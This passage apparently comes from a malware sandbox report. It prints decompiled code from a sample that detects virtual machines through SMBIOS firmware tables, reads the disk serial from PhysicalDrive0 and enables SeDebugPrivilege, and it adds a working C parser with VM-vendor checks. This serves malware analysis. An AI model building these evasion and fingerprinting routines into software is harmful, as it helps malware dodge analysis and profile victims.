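    socklen_t len;
    int fd;

    memset(&ss, 0, sizeof ss);
    if (addr == NULL || *addr == '\0')
        addr = "0.0.0.0";

    if (inet_pton(AF_INET, addr, &s4->sin_addr) == 1) {
        s4->sin_family = AF_INET;            /* sockaddr_in: 16 bytes (0x10) */
        len = sizeof *s4;
    } else if (inet_pton(AF_INET6, addr, &s6->sin6_addr) == 1) {
        s6->sin6_family = AF_INET6;          /* sockaddr_in6: 28 bytes (0x1c) */
        len = sizeof *s6;
        r.family = AF_INET6;
    } else {
        r.status = PROBE_BAD_ADDR;
        r.err = EINVAL;
        return r;
    }

    fd = socket(r.family, SOCK_STREAM, IPPROTO_TCP);   /* socket(family, 1, 6) */
    if (fd < 0) {
        r.status = PROBE_SOCKET_FAILED;
        r.err = errno;
        return r;
    }
    if (bind(fd, (struct sockaddr *)&ss, len) < 0) {    /* bind(s, &sa, 0x10 or 0x1c) */
        r.status = PROBE_BIND_FAILED;
        r.err = errno;                                   /* EADDRNOTAVAIL for a non-local address */
        close(fd);
        return r;
    }
    /* Port 0 asked the kernel for an ephemeral port; read back which one. */
    if (getsockname(fd, (struct sockaddr *)&ss, &len) == 0)
        r.port = ntohs(r.family == AF_INET ? s4->sin_port : s6->sin6_port);
    close(fd);
    return r;
}

int main(int argc, char **argv)
{
    ProbeResult r = probe_bind(argc > 1 ? argv[1] : NULL);
    printf("status=%d err=%s family=%d port=%u\n", r.status,
           r.status ? strerror(r.err) : "-", r.family, r.port);
    return r.status;
}
```

Run with no argument to probe the wildcard address, or pass an address such as 192.0.2.1 to see the bind failure path; a bind on an address the host does not own is the cheap way to tell "configured locally" from "not ours" without touching the interface list.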
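The listing that follows, E04EC6740, calls GetSystemFirmwareTable with provider 'RSMB' (0x52534d42) twice (size query, then fetch), checks that the RawSMBIOSData Length field equals the bytes returned minus the 8-byte header, and walks the SMBIOS structures until it reaches Type 1 (System Information), which is the "Query firmware table information (likely to detect VMs)" behaviour the report flags. This added example, not the sample's code, is a parser for that layout run over a constructed RawSMBIOSData blob describing a VirtualBox guest, followed by a vendor-marker check; the marker list is illustrative and is not taken from the sample, and the names SysInfo, parse_smbios_system_info and looks_like_vm are this example's own. Under _WIN32 it also fetches the live table with the same two-call pattern.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fields read from the SMBIOS Type 1 (System Information) structure. */
typedef struct {
    int found;               /* 1 once a Type 1 structure has been parsed */
    int major, minor;        /* SMBIOS version from the RawSMBIOSData header */
    char manufacturer[64];   /* string index at offset 04h */
    char product[64];        /* string index at offset 05h */
    uint8_t uuid[16];        /* bytes 08h..17h, raw, not byte-swapped */
} SysInfo;

/* Copy the n-th (1-based) string of a structure's string-set into dst;
 * index 0 or an out-of-range index yields "". */
static void smbios_string(char *dst, size_t cap, const uint8_t *s,
                          const uint8_t *end, unsigned n)
{
    while (n > 1 && s < end && *s) { s += strlen((const char *)s) + 1; n--; }
    snprintf(dst, cap, "%s", (n >= 1 && s < end && *s) ? (const char *)s : "");
}

/* Parse a RawSMBIOSData blob as GetSystemFirmwareTable('RSMB') returns it:
 * an 8-byte header, then SMBIOS structures each made of a formatted area
 * (type, length, handle, fields) and a string-set ending in a double NUL.
 * Returns 1 when a Type 1 structure was found, 0 otherwise or on bad input. */
int parse_smbios_system_info(const uint8_t *raw, size_t size, SysInfo *out)
{
    uint32_t length;
    size_t off = 8;
    memset(out, 0, sizeof *out);
    if (size < 8) return 0;
    memcpy(&length, raw + 4, 4);                  /* RawSMBIOSData.Length */
    if (length != size - 8) return 0;             /* same check the sample makes */
    out->major = raw[1];
    out->minor = raw[2];
    while (off + 4 <= size) {
        uint8_t type = raw[off], len = raw[off + 1];
        if (len < 4 || off + len > size) return 0;
        const uint8_t *p = raw + off, *strings = raw + off + len, *end = raw + size;
        if (type == 1 && len >= 0x18) {
            out->found = 1;
            smbios_string(out->manufacturer, sizeof out->manufacturer, strings, end, p[4]);
            smbios_string(out->product, sizeof out->product, strings, end, p[5]);
            memcpy(out->uuid, p + 8, 16);
        }
        if (type == 127) break;                   /* end-of-table structure */
        size_t s = off + len;                     /* skip the string-set to its double NUL */
        while (s + 1 < size && !(raw[s] == 0 && raw[s + 1] == 0)) s++;
        off = s + 2;
    }
    return out->found;
}

/* Illustrative VM vendor markers; the sample's own list is not visible here. */
int looks_like_vm(const SysInfo *si)
{
    static const char *markers[] = { "VMware", "VirtualBox", "innotek", "QEMU",
                                     "Xen", "Parallels", "Virtual Machine" };
    if (!si->found) return 0;
    for (size_t i = 0; i < sizeof markers / sizeof markers[0]; i++)
        if (strstr(si->manufacturer, markers[i]) || strstr(si->product, markers[i]))
            return 1;
    return 0;
}

#ifdef _WIN32
#include <windows.h>
/* Same two-call pattern as the sample: size query, allocate, fetch, parse. */
int read_live_system_info(SysInfo *out)
{
    UINT need = GetSystemFirmwareTable(0x52534D42 /* 'RSMB' */, 0, NULL, 0);
    uint8_t *buf = need ? (uint8_t *)malloc(need) : NULL;
    int ok = buf && GetSystemFirmwareTable(0x52534D42, 0, buf, need) == need
             && parse_smbios_system_info(buf, need, out);
    free(buf);
    return ok;
}
#endif

/* Constructed blob (not captured from the sample): SMBIOS 2.8 header, a Type 0
 * with one string, a Type 1 describing a VirtualBox guest, Type 127 terminator. */
static const uint8_t sample_raw[] = {
    0x00, 0x02, 0x08, 0x00, 0x4a, 0x00, 0x00, 0x00,           /* header, Length = 74 */
    0x00, 0x04, 0x00, 0x00, 'V', 'B', 'o', 'x', 0x00, 0x00,   /* Type 0, len 4 */
    0x01, 0x1b, 0x01, 0x00, 0x01, 0x02, 0x03, 0x04,           /* Type 1, len 27, string idx */
    0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17,           /* UUID */
    0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f,
    0x06, 0x05, 0x06,                                         /* wake-up, SKU, family */
    'i','n','n','o','t','e','k',' ','G','m','b','H', 0x00,
    'V','i','r','t','u','a','l','B','o','x', 0x00, '1','.','2', 0x00, '0', 0x00, 0x00,
    0x7f, 0x04, 0x02, 0x00, 0x00, 0x00,                       /* Type 127, len 4 */
};

int main(void)
{
    SysInfo si;
#ifdef _WIN32
    if (!read_live_system_info(&si))
#endif
        parse_smbios_system_info(sample_raw, sizeof sample_raw, &si);
    printf("SMBIOS %d.%d manufacturer=\"%s\" product=\"%s\" vm=%d\n",
           si.major, si.minor, si.manufacturer, si.product, looks_like_vm(&si));
    return 0;
}
```

The double-NUL scan is what keeps the walk aligned; a walker that stops at the first NUL, as the decompiled loop below appears to, only stays in sync for structures whose string-set is empty, so on a real table it will land mid-string for everything after the first populated structure.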

                                                                                    C-Code - Quality: 74%
                                                                                    			E04EC6740(void* __ecx, void* __edi, char* __esi) {
                                                                                    				intOrPtr _v8;
                                                                                    				signed int _v16;
                                                                                    				struct _OVERLAPPED* _v32;
                                                                                    				struct _OVERLAPPED* _v36;
                                                                                    				void _v40;
                                                                                    				char _v44;
                                                                                    				struct _OVERLAPPED* _v48;
                                                                                    				void* _v52;
                                                                                    				long _v56;
                                                                                    				void* _v60;
                                                                                    				intOrPtr _v64;
                                                                                    				signed int _t119;
                                                                                    				_Unknown_base(*)()* _t123;
                                                                                    				intOrPtr _t125;
                                                                                    				void* _t126;
                                                                                    				char _t137;
                                                                                    				char _t138;
                                                                                    				intOrPtr _t140;
                                                                                    				char _t143;
                                                                                    				intOrPtr _t144;
                                                                                    				char _t147;
                                                                                    				intOrPtr _t148;
                                                                                    				void* _t152;
                                                                                    				char _t153;
                                                                                    				intOrPtr _t154;
                                                                                    				intOrPtr _t155;
                                                                                    				intOrPtr _t159;
                                                                                    				intOrPtr _t163;
                                                                                    				intOrPtr _t167;
                                                                                    				intOrPtr _t171;
                                                                                    				void* _t173;
                                                                                    				intOrPtr _t177;
                                                                                    				void* _t178;
                                                                                    				intOrPtr* _t190;
                                                                                    				intOrPtr* _t192;
                                                                                    				intOrPtr* _t194;
                                                                                    				intOrPtr* _t197;
                                                                                    				intOrPtr* _t199;
                                                                                    				intOrPtr* _t202;
                                                                                    				intOrPtr* _t204;
                                                                                    				intOrPtr* _t206;
                                                                                    				void* _t207;
                                                                                    				intOrPtr _t208;
                                                                                    				intOrPtr _t209;
                                                                                    				intOrPtr _t210;
                                                                                    				intOrPtr* _t211;
                                                                                    				intOrPtr* _t212;
                                                                                    				intOrPtr* _t214;
                                                                                    				intOrPtr* _t216;
                                                                                    				intOrPtr* _t218;
                                                                                    				void* _t225;
                                                                                    				long _t226;
                                                                                    				long _t227;
                                                                                    				void* _t228;
                                                                                    				char* _t229;
                                                                                    				char* _t230;
                                                                                    				char* _t231;
                                                                                    				void* _t232;
                                                                                    				char* _t233;
                                                                                    				void* _t234;
                                                                                    				void* _t235;
                                                                                    				void* _t236;
                                                                                    				intOrPtr _t237;
                                                                                    				intOrPtr _t238;
                                                                                    				intOrPtr* _t245;
                                                                                    				long _t246;
                                                                                    				void* _t248;
                                                                                    				struct _OVERLAPPED* _t251;
                                                                                    				intOrPtr* _t253;
                                                                                    				void* _t258;
                                                                                    				signed int _t261;
                                                                                    				void* _t262;
                                                                                    				void* _t263;
                                                                                    				void* _t264;
                                                                                    				intOrPtr _t298;
                                                                                    
                                                                                    				_t250 = __esi;
                                                                                    				_t186 = __ecx;
                                                                                    				_t261 = (_t258 - 0x00000008 & 0xfffffff0) + 4;
                                                                                    				_v8 =  *((intOrPtr*)(_t258 + 4));
                                                                                    				_t256 = _t261;
                                                                                    				_t262 = _t261 - 0x58;
                                                                                    				_t119 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v16 = _t119 ^ _t261;
                                                                                    				_push(__esi);
                                                                                    				asm("xorps xmm0, xmm0");
                                                                                    				_v48 = 0;
                                                                                    				asm("movaps [ebp-0x50], xmm0");
                                                                                    				_t245 = 0;
                                                                                    				asm("movaps [ebp-0x20], xmm0");
                                                                                    				_v64 = 0;
                                                                                     				_t123 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemFirmwareTable"); // resolved at run time rather than imported
                                                                                     				_v56 = _t123;
                                                                                     				if(_t123 != 0) {
                                                                                     					_t250 =  *_t123(0x52534d42, 0, 0, 0); // 'RSMB': size query for the raw SMBIOS table
                                                                                     					_t269 = _t250;
                                                                                     					if(_t250 != 0) {
                                                                                     						_push(_t250);
                                                                                     						_t177 = E04ED5785(_t186, _t250, _t269); // allocate _t250 bytes
                                                                                     						_t262 = _t262 + 4;
                                                                                     						_v64 = _t177;
                                                                                     						if(_t177 != 0) {
                                                                                     							_t178 = _v56(0x52534d42, 0, _t177, _t250); // second call fills the buffer with RawSMBIOSData
                                                                                     							_t237 = _v64;
                                                                                     							_t250 = _t237 + 8; // SMBIOSTableData follows the 8-byte RawSMBIOSData header
                                                                                     							_t238 =  *((intOrPtr*)(_t237 + 4)); // RawSMBIOSData.Length
                                                                                     							if(_t238 == _t178 + 0xfffffff8) { // Length must equal bytes returned minus the header
                                                                                     								_t186 = 0;
                                                                                     								if(_t238 != 0) {
                                                                                     									while( *_t250 != 1) { // walk structures until Type 1 (System Information)
                                                                                     										_t253 = _t250 + ( *(_t250 + 1) & 0x000000ff); // skip the formatted area (length byte at +1)
                                                                                     										while( *_t253 != _t245) { // _t245 == 0: scan the string-set for a NUL
                                                                                     											_t253 = _t253 + 1;
                                                                                     										}
                                                                                     										_t186 = _t186 + 1;
                                                                                     										_t250 = _t253 + 2; // step past the terminator to the next structure
                                                                                     										_t276 = _t186 - _t238;
                                                                                     										if(_t186 < _t238) { // structure counter compared against Length, as decompiled
                                                                                     											continue;
                                                                                     										} else {
                                                                                     										}
                                                                                     										goto L11;
                                                                                     									}
                                                                                     									_t245 = E04EC66D0(_t250,  *((intOrPtr*)(_t250 + 4))); // Type 1 structure and its DWORD at +4 (string indices: manufacturer, product, version, serial)
                                                                                     									_t186 = _t250 + 8; // +8 in a Type 1 structure is the 16-byte system UUID
                                                                                     									E04EC6640(_t250 + 8, ( *(_v64 + 1) & 0x000000ff) * 0x100 + ( *(_v64 + 2) & 0x000000ff),  &_v44); // (SMBIOSMajorVersion << 8) | SMBIOSMinorVersion; consistent with UUID decoding, whose byte order changed in SMBIOS 2.6
                                                                                     									asm("movaps xmm0, [ebp-0x20]");
                                                                                     									_t262 = _t262 + 4;
                                                                                     									asm("movaps [ebp-0x50], xmm0"); // 16-byte copy of the result into the second local buffer
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				L11:
                                                                                    				_push(0x2000);
                                                                                    				_t225 = E04ED5785(_t186, _t250, _t276);
                                                                                    				_t263 = _t262 + 4;
                                                                                    				_t251 = 0;
                                                                                    				_v60 = _t225;
                                                                                    				if(_t225 != 0) {
                                                                                    					E04EDDAD0(_t245, _t225, 0, 0x2000);
                                                                                    					_t263 = _t263 + 0xc;
                                                                                    					_v56 = 0;
                                                                                    					asm("xorps xmm0, xmm0");
                                                                                    					_v32 = 0;
                                                                                    					asm("movq [ebp-0x1c], xmm0");
                                                                                    					_v40 = 0;
                                                                                    					_v36 = 0;
                                                                                    					_t173 = CreateFileA("\\\\.\\PhysicalDrive0", 0x80000000, 3, 0, 3, 0, 0);
                                                                                    					_v52 = _t173;
                                                                                    					if(_t173 != 0xffffffff) {
                                                                                    						_t186 =  &_v40;
                                                                                    						DeviceIoControl(_t173, 0x2d1400,  &_v40, 0xc, _v60, 0x2000,  &_v56, 0);
                                                                                    						_t251 =  !=  ? _v60 : 0;
                                                                                    						CloseHandle(_v52);
                                                                                    					}
                                                                                    					_t225 = _v60;
                                                                                    				}
                                                                                    				if(_t245 == 0) {
                                                                                    					_t125 = 0;
                                                                                    					__eflags = 0;
                                                                                    				} else {
                                                                                    					_t218 = _t245;
                                                                                    					_t31 = _t218 + 1; // 0x1
                                                                                    					_v52 = _t31;
                                                                                    					do {
                                                                                    						_t171 =  *_t218;
                                                                                    						_t218 = _t218 + 1;
                                                                                    					} while (_t171 != 0);
                                                                                    					_t186 = _t218 - _v52;
                                                                                    					_t125 = _t218 - _v52 + 1;
                                                                                    					_v48 = _t125;
                                                                                    				}
                                                                                    				if(_t251 != 0) {
                                                                                    					_t208 = _t251->OffsetHigh;
                                                                                    					if(_t208 != 0) {
                                                                                    						_t216 = _t208 + _t225;
                                                                                    						_v52 = _t216 + 1;
                                                                                    						do {
                                                                                    							_t167 =  *_t216;
                                                                                    							_t216 = _t216 + 1;
                                                                                    						} while (_t167 != 0);
                                                                                    						_t125 = _v48 + 1 + _t216 - _v52;
                                                                                    						_v48 = _t125;
                                                                                    					}
                                                                                    					_t209 = _t251->hEvent;
                                                                                    					if(_t209 != 0) {
                                                                                    						_t214 = _t209 + _t225;
                                                                                    						_v52 = _t214 + 1;
                                                                                    						do {
                                                                                    							_t163 =  *_t214;
                                                                                    							_t214 = _t214 + 1;
                                                                                    						} while (_t163 != 0);
                                                                                    						_t125 = _v48 + 1 + _t214 - _v52;
                                                                                    						_v48 = _t125;
                                                                                    					}
                                                                                    					_t210 =  *((intOrPtr*)(_t251 + 0x14));
                                                                                    					if(_t210 != 0) {
                                                                                    						_t212 = _t210 + _t225;
                                                                                    						_v52 = _t212 + 1;
                                                                                    						do {
                                                                                    							_t159 =  *_t212;
                                                                                    							_t212 = _t212 + 1;
                                                                                    						} while (_t159 != 0);
                                                                                    						_t125 = _v48 + 1 + _t212 - _v52;
                                                                                    						_v48 = _t125;
                                                                                    					}
                                                                                    					_t186 =  *((intOrPtr*)(_t251 + 0x18));
                                                                                    					if(_t186 != 0) {
                                                                                    						_t211 = _t186 + _t225;
                                                                                    						_t236 = _t211 + 1;
                                                                                    						do {
                                                                                    							_t155 =  *_t211;
                                                                                    							_t211 = _t211 + 1;
                                                                                    						} while (_t155 != 0);
                                                                                    						_t186 = _t211 - _t236;
                                                                                    						_t125 = _v48 + 1 + _t211 - _t236;
                                                                                    						_t298 = _t125;
                                                                                    						_v48 = _t125;
                                                                                    					}
                                                                                    				}
                                                                                    				_t126 = _t125 + 0x28;
                                                                                    				_push(_t126);
                                                                                    				_v52 = _t126;
                                                                                    				_t226 = E04ED5785(_t186, _t251, _t298);
                                                                                    				_t264 = _t263 + 4;
                                                                                    				_v56 = _t226;
                                                                                    				if(_t226 == 0) {
                                                                                    					L68:
                                                                                    					_t246 = _v56;
                                                                                    				} else {
                                                                                    					E04EDDAD0(_t245, _t226, 0, _v52);
                                                                                    					_t227 = _v56;
                                                                                    					_t264 = _t264 + 0xc;
                                                                                    					asm("movaps xmm0, [ebp-0x50]");
                                                                                    					 *_t227 = _v48;
                                                                                    					_t136 = 0x28;
                                                                                    					_v48 = 0x28;
                                                                                    					asm("movups [edx+0x4], xmm0");
                                                                                    					if(_t245 != 0) {
                                                                                    						 *((intOrPtr*)(_t227 + 0x14)) = 0x28;
                                                                                    						_t206 = _t245;
                                                                                    						_t152 = _t227 + 0x28 - _t245;
                                                                                    						_v52 = _t152;
                                                                                    						_t235 = _t152;
                                                                                    						asm("o16 nop [eax+eax]");
                                                                                    						do {
                                                                                    							_t153 =  *_t206;
                                                                                    							_t206 = _t206 + 1;
                                                                                    							 *((char*)(_t235 + _t206 - 1)) = _t153;
                                                                                    						} while (_t153 != 0);
                                                                                    						_t227 = _v56;
                                                                                    						_t71 = _t245 + 1; // 0x1
                                                                                    						_t207 = _t71;
                                                                                    						do {
                                                                                    							_t154 =  *_t245;
                                                                                    							_t245 = _t245 + 1;
                                                                                    						} while (_t154 != 0);
                                                                                    						_t72 = _t245 - _t207 + 0x29; // 0x2a
                                                                                    						_t136 = _t72;
                                                                                    						_v48 = _t136;
                                                                                    					}
                                                                                    					if(_t251 == 0) {
                                                                                    						goto L68;
                                                                                    					} else {
                                                                                    						_t248 = _v60;
                                                                                    						if(_t251->OffsetHigh != 0) {
                                                                                    							 *((intOrPtr*)(_t227 + 0x18)) = _t136;
                                                                                    							_t202 = _t251->OffsetHigh + _t248;
                                                                                    							_t233 = _t227 + _t136;
                                                                                    							do {
                                                                                    								_t147 =  *_t202;
                                                                                    								_t202 = _t202 + 1;
                                                                                    								 *_t233 = _t147;
                                                                                    								_t233 = _t233 + 1;
                                                                                    							} while (_t147 != 0);
                                                                                    							_t204 = _t251->OffsetHigh + _t248;
                                                                                    							_t234 = _t204 + 1;
                                                                                    							do {
                                                                                    								_t148 =  *_t204;
                                                                                    								_t204 = _t204 + 1;
                                                                                    							} while (_t148 != 0);
                                                                                    							_t227 = _v56;
                                                                                    							_t136 = _v48 + 1 + _t204 - _t234;
                                                                                    							_v48 = _t136;
                                                                                    						}
                                                                                    						if(_t251->hEvent != 0) {
                                                                                    							 *((intOrPtr*)(_t227 + 0x1c)) = _t136;
                                                                                    							_t197 = _t251->hEvent + _t248;
                                                                                    							_t231 = _t227 + _t136;
                                                                                    							do {
                                                                                    								_t143 =  *_t197;
                                                                                    								_t197 = _t197 + 1;
                                                                                    								 *_t231 = _t143;
                                                                                    								_t231 = _t231 + 1;
                                                                                    							} while (_t143 != 0);
                                                                                    							_t199 = _t251->hEvent + _t248;
                                                                                    							_t232 = _t199 + 1;
                                                                                    							do {
                                                                                    								_t144 =  *_t199;
                                                                                    								_t199 = _t199 + 1;
                                                                                    							} while (_t144 != 0);
                                                                                    							_t136 = _v48 + 1 + _t199 - _t232;
                                                                                    							_v48 = _t136;
                                                                                    						}
                                                                                    						_t246 = _v56;
                                                                                    						if( *((intOrPtr*)(_t251 + 0x14)) == 0) {
                                                                                    							_t228 = _v60;
                                                                                    						} else {
                                                                                    							 *((intOrPtr*)(_t246 + 0x20)) = _t136;
                                                                                    							_t230 = _t136 + _t246;
                                                                                    							_t192 =  *((intOrPtr*)(_t251 + 0x14)) + _v60;
                                                                                    							do {
                                                                                    								_t138 =  *_t192;
                                                                                    								_t192 = _t192 + 1;
                                                                                    								 *_t230 = _t138;
                                                                                    								_t230 = _t230 + 1;
                                                                                    							} while (_t138 != 0);
                                                                                    							_t228 = _v60;
                                                                                    							_t194 =  *((intOrPtr*)(_t251 + 0x14)) + _t228;
                                                                                    							_v52 = _t194 + 1;
                                                                                    							do {
                                                                                    								_t140 =  *_t194;
                                                                                    								_t194 = _t194 + 1;
                                                                                    							} while (_t140 != 0);
                                                                                    							_t136 = _v48 + 1 + _t194 - _v52;
                                                                                    						}
                                                                                    						if( *((intOrPtr*)(_t251 + 0x18)) != 0) {
                                                                                    							 *((intOrPtr*)(_t246 + 0x24)) = _t136;
                                                                                    							_t190 =  *((intOrPtr*)(_t251 + 0x18)) + _t228;
                                                                                    							_t229 = _t136 + _t246;
                                                                                    							do {
                                                                                    								_t137 =  *_t190;
                                                                                    								_t190 = _t190 + 1;
                                                                                    								 *_t229 = _t137;
                                                                                    								_t229 = _t229 + 1;
                                                                                    							} while (_t137 != 0);
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				_t128 = _v60;
                                                                                    				if(_v60 != 0) {
                                                                                    					E04ED573F(_t128);
                                                                                    					_t264 = _t264 + 4;
                                                                                    				}
                                                                                    				_t129 = _v64;
                                                                                    				if(_v64 != 0) {
                                                                                    					E04ED573F(_t129);
                                                                                    				}
                                                                                    				return E04ED572E(_v16 ^ _t256);
                                                                                    			}

                                                                                    0x04ec6740
                                                                                    0x04ec6740
                                                                                    0x04ec6749
                                                                                    0x04ec6750
                                                                                    0x04ec6754
                                                                                    0x04ec6756
                                                                                    0x04ec6759
                                                                                    0x04ec6760
                                                                                    0x04ec6763
                                                                                    0x04ec6765
                                                                                    0x04ec6771
                                                                                    0x04ec6779
                                                                                    0x04ec677d
                                                                                    0x04ec677f
                                                                                    0x04ec6783
                                                                                    0x04ec678d
                                                                                    0x04ec6793
                                                                                    0x04ec6798
                                                                                    0x04ec67a8
                                                                                    0x04ec67aa
                                                                                    0x04ec67ac
                                                                                    0x04ec67b2
                                                                                    0x04ec67b3
                                                                                    0x04ec67b8
                                                                                    0x04ec67bb
                                                                                    0x04ec67c0
                                                                                    0x04ec67ce
                                                                                    0x04ec67d1
                                                                                    0x04ec67d7
                                                                                    0x04ec67da
                                                                                    0x04ec67df
                                                                                    0x04ec67e1
                                                                                    0x04ec67e5
                                                                                    0x04ec67e7
                                                                                    0x04ec67f0
                                                                                    0x04ec67f5
                                                                                    0x04ec67f7
                                                                                    0x04ec67f8
                                                                                    0x04ec67fd
                                                                                    0x04ec67fe
                                                                                    0x04ec6801
                                                                                    0x04ec6803
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec6805
                                                                                    0x00000000
                                                                                    0x04ec6803
                                                                                    0x04ec6811
                                                                                    0x04ec6833
                                                                                    0x04ec6836
                                                                                    0x04ec683b
                                                                                    0x04ec683f
                                                                                    0x04ec6842

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemFirmwareTable,?,00000000), ref: 04EC6786
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC678D
                                                                                    • CreateFileA.KERNEL32(\\.\PhysicalDrive0,80000000,00000003,00000000,00000003,00000000,00000000), ref: 04EC6892
                                                                                    • DeviceIoControl.KERNEL32 ref: 04EC68B9
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC68C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Handle$AddressCloseControlCreateDeviceFileModuleProc
                                                                                    • String ID: GetSystemFirmwareTable$\\.\PhysicalDrive0$kernel32
                                                                                    • API String ID: 2970610107-3170356133
                                                                                    • Opcode ID: 13ddb0a52022b396464e79f6b53dcbe04438702dff27b5d3da2af361ef7765dc
                                                                                    • Instruction ID: 9cae78e8bac9f3d90017e682b938ae05a3bbea68eef7d595a39e7556d0ed14bc
                                                                                    • Opcode Fuzzy Hash: 13ddb0a52022b396464e79f6b53dcbe04438702dff27b5d3da2af361ef7765dc
                                                                                    • Instruction Fuzzy Hash: 45E1C474A042059FDF15CF78D950AEEFBF1EF49318B18926DD886AB301E732A946CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 85%
                                                                                    			E04ECAA70(void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				intOrPtr _v12;
                                                                                    				struct _TOKEN_PRIVILEGES _v24;
                                                                                    				void* _v28;
                                                                                    				signed int _t11;
                                                                                    				void* _t22;
                                                                                    				signed int _t33;
                                                                                    
                                                                                    				_t11 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t11 ^ _t33;
                                                                                    				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                    					_v24.PrivilegeCount = 1;
                                                                                    					_v12 = 2;
                                                                                    					LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &(_v24.Privileges));
                                                                                    					AdjustTokenPrivileges(_v28, 0,  &_v24, 0x10, 0, 0);
                                                                                    					GetLastError();
                                                                                    					_t32 =  !=  ? 0 : 1;
                                                                                    					CloseHandle(_v28);
                                                                                    					_t22 =  !=  ? 0 : 1;
                                                                                    					return E04ED572E(_v8 ^ _t33);
                                                                                    				} else {
                                                                                    					return E04ED572E(_v8 ^ _t33);
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,ntdll.dll,74B60320,00000000,?), ref: 04ECAA8C
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,ntdll.dll,74B60320,00000000,?), ref: 04ECAA93
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 04ECAAC1
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,?,ntdll.dll,74B60320), ref: 04ECAAD6
                                                                                    • GetLastError.KERNEL32(?,?,?,ntdll.dll,74B60320), ref: 04ECAADC
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,ntdll.dll,74B60320), ref: 04ECAAEC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                    • String ID: SeDebugPrivilege
                                                                                    • API String ID: 3398352648-2896544425
                                                                                    • Opcode ID: e73888ab0bb8817dbb14feed59c2620f27898e50900df4eec6d653651a25777b
                                                                                    • Instruction ID: 73f3663defabb560694663ebe6f46a9445bb6f3260615fd68a28df49c5d1b246
                                                                                    • Opcode Fuzzy Hash: e73888ab0bb8817dbb14feed59c2620f27898e50900df4eec6d653651a25777b
                                                                                    • Instruction Fuzzy Hash: F1019B75A0120CFBEB10DFA5EC0ABBE7BB9EF44701F10005AFD05E6184DA755D448B94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 26%
                                                                                    			E04EBC540(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                    				signed int _v8;
                                                                                    				short _v12;
                                                                                    				char _v14;
                                                                                    				short _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				short _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				intOrPtr _v32;
                                                                                    				intOrPtr _v296;
                                                                                    				intOrPtr _v300;
                                                                                    				intOrPtr _v304;
                                                                                    				char _v308;
                                                                                    				intOrPtr _v312;
                                                                                    				intOrPtr _v316;
                                                                                    				intOrPtr _v320;
                                                                                    				intOrPtr _v324;
                                                                                    				signed int _t101;
                                                                                    				_Unknown_base(*)()* _t108;
                                                                                    				void* _t113;
                                                                                    				intOrPtr _t114;
                                                                                    				intOrPtr _t115;
                                                                                    				void* _t139;
                                                                                    				intOrPtr* _t140;
                                                                                    				intOrPtr* _t150;
                                                                                    				intOrPtr* _t153;
                                                                                    				intOrPtr* _t157;
                                                                                    				void* _t158;
                                                                                    				void* _t160;
                                                                                    				void* _t161;
                                                                                    				void* _t162;
                                                                                    				void* _t169;
                                                                                    				void* _t170;
                                                                                    				intOrPtr _t175;
                                                                                    				void* _t176;
                                                                                    				void* _t182;
                                                                                    				intOrPtr* _t188;
                                                                                    				signed int _t189;
                                                                                    				void* _t191;
                                                                                    				void* _t197;
                                                                                    				intOrPtr _t198;
                                                                                    				void* _t200;
                                                                                    				void* _t202;
                                                                                    				void* _t203;
                                                                                    				void* _t205;
                                                                                    				void* _t209;
                                                                                    				void* _t211;
                                                                                    				void* _t214;
                                                                                    				void* _t217;
                                                                                    				struct HINSTANCE__* _t220;
                                                                                    				void* _t221;
                                                                                    				void* _t222;
                                                                                    				void* _t223;
                                                                                    				void* _t224;
                                                                                    				void* _t225;
                                                                                    				void* _t226;
                                                                                    				signed int _t227;
                                                                                    
                                                                                    				_t197 = __edi;
                                                                                    				_t101 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t101 ^ _t227;
                                                                                    				_v324 = _a4;
                                                                                    				_v316 = _a8;
                                                                                    				_t220 = GetModuleHandleA("ntdll");
                                                                                    				if(_t220 == 0) {
                                                                                    					L91:
                                                                                    					return E04ED572E(_v8 ^ _t227);
                                                                                    				} else {
                                                                                    					E04EDDAD0(__edi,  &_v308, 0, 0x114);
                                                                                    					_t108 = GetProcAddress(_t220, "RtlGetVersion");
                                                                                    					if(_t108 == 0) {
                                                                                    						goto L91;
                                                                                    					} else {
                                                                                    						_push( &_v308);
                                                                                    						if( *_t108() != 0 || _t220->i != 0x5a4d) {
                                                                                    							goto L91;
